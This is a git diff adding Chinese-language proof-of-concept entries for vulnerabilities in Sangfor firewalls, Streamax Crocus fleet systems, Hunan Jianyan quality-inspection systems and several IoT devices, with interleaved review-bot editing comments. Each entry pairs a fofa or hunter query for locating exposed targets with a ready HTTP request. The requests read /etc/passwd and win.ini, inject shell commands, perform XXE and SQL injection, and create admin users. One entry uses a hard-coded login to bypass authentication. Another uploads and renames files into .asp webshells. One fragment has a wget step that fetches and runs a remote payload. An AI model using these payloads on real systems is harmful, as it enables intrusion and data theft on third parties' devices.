+Host: +Cookie: PHPSESSID=2e01d2ji93utnsb5abrcm780c2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Connection: close +Content-Length: 625 + +type=logged&un=watchTowr;wget http:///cmd.txt;source /virus/dcweb/webapps/cmd.txt&up=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&vericode= +``` + +Cmd.txt 有效载荷: +``` +sed -i s/Lock/"$(id)"/g /virus/dcweb/conf/lang/eng.utf8.lang.app.php +``` + +![](https://labs.watchtowr.com/content/images/2023/10/image-13.png) diff --git a/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md b/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md new file mode 100644 index 0000000..bb2018c --- /dev/null +++ b/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +# 深信服下一代防火墙NGAF loadfile存在任意文件读取漏洞 + +# 一、漏洞简介 +深信服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。该系统存在任意文件读取漏洞,会造成敏感信息泄露。 + +# 二、影响版本 ++ 深信服下一代防火墙NGAF + +# 三、资产测绘 ++ fofa`title="SANGFOR | NGAF"` ++ 特征 + +![1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74.png](./img/kJMEluyAHaF5_DOx/1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74-683282.png) + +# 四、漏洞复现 +```plain +GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded +y-forwarded-for: 127.0.0.1 +``` + +![1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb.png](./img/kJMEluyAHaF5_DOx/1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb-103266.png) + + + +> 更新: 2024-04-19 08:49:27 +> 原文: \ No newline at end of file diff --git a/深信服应用交付管理系统download存在任意文件读取漏洞.md b/深信服应用交付管理系统download存在任意文件读取漏洞.md new file mode 100644 index 0000000..aa1d9a3 --- /dev/null +++ b/深信服应用交付管理系统download存在任意文件读取漏洞.md 
@@ -0,0 +1,34 @@ +# 深信服应用交付管理系统download存在任意文件读取漏洞 + +# 一、漏洞简介 +SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件。 + +# 二、影响版本 ++ 深信服应用交付管理系统 + +# 三、资产测绘 ++ hunter`app.name="SANGFOR 深信服应用交付报表系统"` + +![1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2.png](./img/inddIlyPIEVWA20l/1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2-600823.png) + ++ 登录页面 + +![1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557.png](./img/inddIlyPIEVWA20l/1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557-195155.png) + +# 四、漏洞复现 +```plain +GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1713459981265-735fdb41-5657-4fbd-b2cf-4cec25a0eb5c.png](./img/inddIlyPIEVWA20l/1713459981265-735fdb41-5657-4fbd-b2cf-4cec25a0eb5c-129484.png) + + + +> 更新: 2024-04-19 08:49:27 +> 原文: \ No newline at end of file diff --git a/深信服应用交付管理系统rep_login远程命令执行漏洞.md b/深信服应用交付管理系统rep_login远程命令执行漏洞.md new file mode 100644 index 0000000..86c3b17 --- /dev/null +++ b/深信服应用交付管理系统rep_login远程命令执行漏洞.md 
@@ -0,0 +1,36 @@ +# 深信服应用交付管理系统rep/login远程命令执行漏洞 + +# 一、漏洞简介 +深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。 + +# 二、影响版本 ++ 深信服应用交付管理系统7.0.8-7.0.8R5 + +# 三、资产测绘 ++ hunter`app.name="SANGFOR 深信服应用交付报表系统"` + +![1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2.png](./img/YVbx9nDj2BQqWKBd/1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2-975958.png) + ++ 登录页面 + +![1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557.png](./img/YVbx9nDj2BQqWKBd/1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557-185987.png) + +# 四、漏洞复现 +```plain +POST /rep/login HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-type: application/x-www-form-urlencoded +Content-Length: 118 + +clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 +``` + +![1692581114528-027f3515-1f23-446c-8ae9-9200fcd494e7.png](./img/YVbx9nDj2BQqWKBd/1692581114528-027f3515-1f23-446c-8ae9-9200fcd494e7-240197.png) + + + +> 更新: 2024-04-19 08:49:27 +> 原文: \ No newline at end of file diff --git a/深信服数据中心管理系统-XML-实体注入漏洞.md b/深信服数据中心管理系统-XML-实体注入漏洞.md new file mode 100644 index 0000000..e7aba4f --- /dev/null +++ b/深信服数据中心管理系统-XML-实体注入漏洞.md @@ -0,0 +1,21 @@ +## 深信服数据中心管理系统 XML 实体注入漏洞 +``` +GET /src/sangforindex HTTP/1.1 +Host: ip:port +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) +Accept: +text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: text/xml +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: Keep-alive +Content-Length: 135 + +]> + +&rootas; + + +``` diff --git a/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md b/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md new file mode 100644 index 0000000..923a8ae --- /dev/null 
+++ b/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md @@ -0,0 +1,25 @@ +# 深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞 + +# 一、漏洞简介 +深圳亮钻科技有限公司是一家专注于面对行业的嵌入式ARM板卡和主机解决方案的高新技术公司。亮钻科技集设计、研发、生产、销售及服务于一体,产品涉及嵌入式ARM板卡、嵌入式主机、通信模块等。深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞。 + +# 二、影响版本 ++ 深圳亮钻科技有限公司iDS联网数字标牌管理系统 + +# 三、资产测绘 ++ fofa `product="亮钻科技-iDS联网数字标牌管理系统"` ++ 特征 + +![1709877666320-20578f7c-2164-46ae-a5d0-5015b33dd62b.png](./img/lacuycDSKiDmUgzN/1709877666320-20578f7c-2164-46ae-a5d0-5015b33dd62b-976768.png) + +# 四、漏洞复现 +```plain +admin/admin +``` + +![1709877710390-c2fd4589-cc53-4a45-afa4-da5248b13270.png](./img/lacuycDSKiDmUgzN/1709877710390-c2fd4589-cc53-4a45-afa4-da5248b13270-425325.png) + + + +> 更新: 2024-03-13 23:54:14 +> 原文: \ No newline at end of file diff --git a/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md b/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md new file mode 100644 index 0000000..d7db668 --- /dev/null +++ b/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md 
@@ -0,0 +1,51 @@ +# 深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入 + +# 一、漏洞简介 +深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入。 + +# 二、影响版本 ++ 酒店智慧营销IPTV系统 + +# 三、资产测绘 ++ hunter`web.title:"登录 - 酒店智慧营销IPTV系统"` ++ 特征 + +![1698932892581-a474c41f-686e-4883-b314-0993a114237b.png](./img/nuMvHSl80FyC2LGY/1698932892581-a474c41f-686e-4883-b314-0993a114237b-672455.png) + +# 四、漏洞复现 +漏洞位置: + +```plain +/xsiptva/cniptv/userlogin.php +``` + +![1698932929487-4f3b4ae5-dfcf-47c5-b276-1d8ce2f24fb4.png](./img/nuMvHSl80FyC2LGY/1698932929487-4f3b4ae5-dfcf-47c5-b276-1d8ce2f24fb4-780511.png) + +登录界面存在sql注入,username参数sql注入漏洞 + +```plain +POST /xsiptva/cniptv/userlogin.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 29 +Origin: http://1.69.37.165:8880 +Connection: close +Referer: http://1.69.37.165:8880/xsiptva/cniptv/userlogin.php +Cookie: PHPSESSID=8kvgnj6bg3vr7ljf12c861s3i4 +Upgrade-Insecure-Requests: 1 + +username=admin&password=admin +``` + +sqlmap + +![1698932982510-115d9e83-2ffa-4ee7-9f81-45fb28de0f62.png](./img/nuMvHSl80FyC2LGY/1698932982510-115d9e83-2ffa-4ee7-9f81-45fb28de0f62-596961.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: \ No newline at end of file diff --git a/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md b/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md new file mode 100644 index 0000000..82a17f2 --- /dev/null +++ b/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md 
@@ -0,0 +1,44 @@ +# 深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞 + +# 一、漏洞简介 +拓普泰尔是深圳市拓普泰尔科技有限公司,2018年10月28日在中国商标局注册成立的品牌,提供集成电路; 计算机硬件; 电传真设备; 芯片(集成电路); 印刷电路板; 数据处理设备; 视频显示屏; 纤维光缆; 连接器(数据处理设备); 集成电路卡等服务。深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞 + +# 二、影响版本 ++ RG2000 + +# 三、资产测绘 +```http +app="TOPTEL-RG2000" +``` + +![1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a.png](./img/7JxBmoSuzuvUDeWr/1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a-728808.png) + +# 四、漏洞复现 +```plain +POST /cmdString.asp HTTP/1.1 +Host: +Content-Length: 90 +Accept: text/plain, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://58.18.212.238:11180 +Referer: http://58.18.212.238:11180/index.html?rand=Nov-14-2022-18:11:039 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: language=0; user=admin; nonce=ffffffff015446cc0026259d; password=3d49ce727b199b6cdca0cf40c217b8d1 +Connection: close + +cmdString=rg_ping_diagnosis%0B%0D%09%0Acmd_diagnosis_dst_address%3D127.0.0.1%7Cls%0D%09%0A +``` + +admin/admin登录 + +通信检测处ping命令和traceroute存在命令执行漏洞 + +![1722620405428-275246cb-7a70-4bef-b880-d27a2161f073.png](./img/7JxBmoSuzuvUDeWr/1722620405428-275246cb-7a70-4bef-b880-d27a2161f073-669894.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: \ No newline at end of file diff --git a/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md b/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md new file mode 100644 index 0000000..db9bc60 --- /dev/null +++ b/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md 
@@ -0,0 +1,36 @@ +# 深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞 + +# 一、漏洞简介 + 深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞,攻击者可通过该漏洞获取管理员账号密码。 + +# 二、影响版本 +视频监控系统 + +# 三、资产测绘 +```plain +product="朗驰欣创-视频监控" +``` + +![1718871063209-09839cc3-6f98-4acc-93d6-58836915bbad.png](./img/IK3XpT3ZSooUYfXz/1718871063209-09839cc3-6f98-4acc-93d6-58836915bbad-621003.png) + +# 四、漏洞复现 +```java +GET /content/network.asp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 +Priority: u=4 +``` + +![1718871123998-a151d153-7d2f-45d6-be9a-2573d89cecd9.png](./img/IK3XpT3ZSooUYfXz/1718871123998-a151d153-7d2f-45d6-be9a-2573d89cecd9-223531.png) + +![1718871159744-6fb67d8c-22d4-4989-a227-8dad29c6d913.png](./img/IK3XpT3ZSooUYfXz/1718871159744-6fb67d8c-22d4-4989-a227-8dad29c6d913-922079.png) + + + +> 更新: 2024-06-23 23:42:48 +> 原文: \ No newline at end of file diff --git a/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md b/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md new file mode 100644 index 0000000..29f1858 --- /dev/null +++ b/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md 
@@ -0,0 +1,32 @@ +# 深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞 + +# 一、漏洞简介 +锐明技术作为一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器,实现对车辆周围环境的实时感知和监控,提高驾驶安全性。利用AI技术,系统能够识别车辆和行人的身份,并分析驾驶员的驾驶行为,及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态,包括货物是否丢失、货箱是否关闭等,并通过3D检测技术实现更精准的货物识别和管理。锐明技术Crocus系统 Service.do接口存在任意文件读取漏洞,未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +# 二、影响版本 ++ Crocus系统 + +# 三、资产测绘 ++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"` ++ 特征 + +![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/5AiGbcw52EzAXtrg/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-759009.png) + +# 四、漏洞复现 +```http +GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 +Host: +Accept-Encoding:gzip,deflate,br +Accept:*/* +Accept-Language:en-US;q=0.9,en;q=0.8 +User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36 +Connection:close +Cache-Control:max-age=0 +``` + +![1720274359372-2627708f-1f2b-442d-b494-cde20eb53e86.png](./img/5AiGbcw52EzAXtrg/1720274359372-2627708f-1f2b-442d-b494-cde20eb53e86-480553.png) + + + +> 更新: 2024-07-20 20:13:56 +> 原文: \ No newline at end of file diff --git a/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md b/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md new file mode 100644 index 0000000..53b2cb4 --- /dev/null +++ b/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md 
@@ -0,0 +1,40 @@ +# 深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞 + +# 一、漏洞简介 +锐明技术作为一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器,实现对车辆周围环境的实时感知和监控,提高驾驶安全性。利用AI技术,系统能够识别车辆和行人的身份,并分析驾驶员的驾驶行为,及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态,包括货物是否丢失、货箱是否关闭等,并通过3D检测技术实现更精准的货物识别和管理。深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞 + +# 二、影响版本 ++ Crocus系统 + +# 三、资产测绘 ++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"` ++ 特征 + +![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/G83rnMK_DVPT5oUJ/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-345699.png) + +# 四、漏洞复现 +```http +POST /RoleUser.do?Action=CreateUser HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Token: d2Vic2VjOjE3MjQwNjk4NzE5NDk= +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=5420BDDEB39984240BE700F2E755F2F9; Saffron.U=VUlEPTImVU49d2Vic2VjJkdJRD0xNzI0MDY5ODcxOTQ5MSZSSUQ9MSZNPUJNYXAmSU5TPTE= +Accept: application/json, text/javascript, */*; q=0.01 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Length: 243 + +UserID=&RoleID=1&DirName=%E6%A0%B9%E7%9B%AE%E5%BD%95&DirPower=1&GroupPower=1&GroupPowerName=crocus-center(81)&UserName=d2Jz&Password=ed5b11f0310676df5b25b140d8aab20e&ConfirmPassword=ed5b11f0310676df5b25b140d8aab20e&TelPhone=&Email=wbs%40qq.com +``` + +![1724151622084-63d6b6f3-0307-46dd-93b7-2d5a96cbec88.png](./img/G83rnMK_DVPT5oUJ/1724151622084-63d6b6f3-0307-46dd-93b7-2d5a96cbec88-504456.png) + +```http +wbs/QWEqwe123登录 +``` + + + +> 更新: 2024-09-06 02:24:17 +> 原文: \ No newline at end of file diff --git a/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md b/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..4cb1d1b --- /dev/null +++ b/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md 
@@ -0,0 +1,33 @@ +# 深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞 + +# 一、漏洞简介 +锐明技术作为一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器,实现对车辆周围环境的实时感知和监控,提高驾驶安全性。利用AI技术,系统能够识别车辆和行人的身份,并分析驾驶员的驾驶行为,及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态,包括货物是否丢失、货箱是否关闭等,并通过3D检测技术实现更精准的货物识别和管理。深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞 + +# 二、影响版本 ++ Crocus系统 + +# 三、资产测绘 ++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"` ++ 特征 + +![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/UYZbMZVovOGNg0S7/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-943722.png) + +# 四、漏洞复现 +```http +GET /Home.do?Action=GetUserInfo&Type=Get&Guid=1724206435273 HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Token: d2JzczoxNzI0MjA2NDIwNzU2 +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=234DBD0F52D9D798CB9931DEDA75131A; Saffron.U=VUlEPTEmVU49Y3JvY3VzJkdJRD0xNzI0MjA3NDQ5NTI2ODYmUklEPTEmTT1CTWFwJklOUz0x +X-Requested-With: XMLHttpRequest +``` + +![1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1.png](./img/UYZbMZVovOGNg0S7/1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1-789831.png) + + + +> 更新: 2024-09-06 02:24:31 +> 原文: \ No newline at end of file diff --git a/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md b/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md new file mode 100644 index 0000000..bb26dbd --- /dev/null +++ b/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md 
@@ -0,0 +1,29 @@ +# 深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞 + +# 一、漏洞简介 +锐明技术作为一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器,实现对车辆周围环境的实时感知和监控,提高驾驶安全性。利用AI技术,系统能够识别车辆和行人的身份,并分析驾驶员的驾驶行为,及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态,包括货物是否丢失、货箱是否关闭等,并通过3D检测技术实现更精准的货物识别和管理。锐明技术Crocus系统 存在用户名密码硬编码漏洞,导致未授权的攻击者利用此漏洞绕过身份认证,直接接管后台,造成敏感信息泄露,且后台存在文件上传接口。深入利用可获取服务器权限,造成严重威胁。 + +# 二、影响版本 ++ Crocus系统 + +# 三、资产测绘 ++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"` ++ 特征 + +![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/dFA2deStckjksa_r/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-431089.png) + +# 四、漏洞复现 +1. 输入用户名`streamax20020818`,密码任意抓包 + +![1720275021075-379ccad6-0be7-4ea8-a6ca-21d87348d968.png](./img/dFA2deStckjksa_r/1720275021075-379ccad6-0be7-4ea8-a6ca-21d87348d968-194885.png) + +2. 将Passwd 修改为:`20020818streamax` 放包即可登录后台 + +![1720275094141-21fef4c0-06eb-41f2-a4db-91054c8eb4d6.png](./img/dFA2deStckjksa_r/1720275094141-21fef4c0-06eb-41f2-a4db-91054c8eb4d6-825199.png) + +![1720275126656-84db2e9d-52aa-4365-b92e-91f1fc8fff01.png](./img/dFA2deStckjksa_r/1720275126656-84db2e9d-52aa-4365-b92e-91f1fc8fff01-500379.png) + + + +> 更新: 2024-07-06 22:12:09 +> 原文: \ No newline at end of file diff --git a/湖南建研-检测系统-admintool-任意文件上传.md b/湖南建研-检测系统-admintool-任意文件上传.md new file mode 100644 index 0000000..72f0134 --- /dev/null +++ b/湖南建研-检测系统-admintool-任意文件上传.md 
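Review bot: The 漏洞简介 asserts that "后台存在文件上传接口" and that deeper exploitation "可获取服务器权限", but nothing in the entry supports that claim; either cite the source or drop it so the entry states only what is demonstrated (a hard-coded account). 二、影响版本 again says only "Crocus系统" and `原文:` is empty; for a hard-coded credential the fixed version matters most, because the only real mitigation is a vendor update or disabling the account. A defender-facing line is missing too: logins with the fixed username `streamax20020818` are a trivially auditable indicator in the application's auth logs.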
@@ -0,0 +1,25 @@ +## 湖南建研-检测系统 admintool 任意文件上传 + + +## fofa +``` +body="/Content/Theme/Standard/webSite/login.css" +``` + +## poc +``` +POST /Scripts/admintool?type=updatefile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 +Content-Length: 41 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate, br + +filePath=dmvckiil.aspx&fileContent=123123 +``` +![7c62372ac4c93cda2a5dbc1ab4b5a986](https://github.com/wy876/POC/assets/139549762/c36d1b3f-f839-40c3-a6ab-23669a0b89dd) + +![940cc53a8930c36235859b455f3983ca](https://github.com/wy876/POC/assets/139549762/097b6b6f-1cde-4aad-96f7-7e70a0f6bbe0) diff --git a/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md b/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md new file mode 100644 index 0000000..6ce5374 --- /dev/null +++ b/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md 
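Review bot: This file duplicates 湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md later in this commit (same endpoint `POST /Scripts/admintool?type=updatefile`, same `filePath=...&fileContent=...` body) under a different title and template; merge the two so the repository has one entry per finding. The `fofa` and `poc` fences have no language tag while the rest of the commit uses `http`/`plain`, and the file has no 影响版本, 漏洞简介 or source section at all, unlike its sibling. Screenshots here point to `github.com/wy876/POC/assets/...` rather than the `./img/` tree used everywhere else; pick one convention.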
@@ -0,0 +1,66 @@ +# 湖南建研工程质量检测系统Attachment存在任意文件上传漏洞 + +# 一、漏洞简介 +湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与,根据各自的职责,上网操作相应的模块,实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 湖南建研工程质量检测系统 + +# 三、资产测绘 ++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"` ++ 特征 + +![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/xVEDcUrG89WfIpu8/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-920956.png) + +# 四、漏洞复现 +1. 上传txt文件 + +```java +POST /Applications/Attachment/upload.ashx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 204 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="123.txt" + +12323344 +--00content0boundary00 +Content-Disposition: form-data; name="_upload_guid" + +123 +--00content0boundary00-- + +``` + + ![1714273613117-5394b2fc-d757-4f78-af67-28fe199a8804.png](./img/xVEDcUrG89WfIpu8/1714273613117-5394b2fc-d757-4f78-af67-28fe199a8804-531084.png) + +2. 将文件改名 + +```java +POST /Standard/Editor/API/File.cshtml?act=geturl HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-type: application/x-www-form-urlencoded +Content-Length: 59 +Connection: close + +filename=/tempData/stc.asp&filetplpath=/tempData/123.txt +``` + +![1714273657972-2fcea581-f80c-41be-a7d5-c01be5325229.png](./img/xVEDcUrG89WfIpu8/1714273657972-2fcea581-f80c-41be-a7d5-c01be5325229-807428.png) + +3. 文件上传位置 + +```java +/tempData/stc.asp +``` + + + +> 更新: 2024-04-28 11:08:22 +> 原文: \ No newline at end of file 
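Review bot: The three code blocks are fenced as ```java but contain an HTTP request, an HTTP request and a URL path; use ```http (as the Crocus entries do) or ```plain so syntax highlighting does not mislead. The 漏洞复现 steps show a two-stage weakness (an upload that accepts only a harmless `123.txt`, then `File.cshtml?act=geturl` renaming it to `stc.asp`), so the root cause is the rename endpoint's lack of extension validation, not the upload itself; the 漏洞简介 and title should say so, since that is where a fix and a detection rule (`filename=` parameters ending in `.asp`/`.aspx` on `/Standard/Editor/API/File.cshtml`) belong. `原文:` is empty and 影响版本 gives no version.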
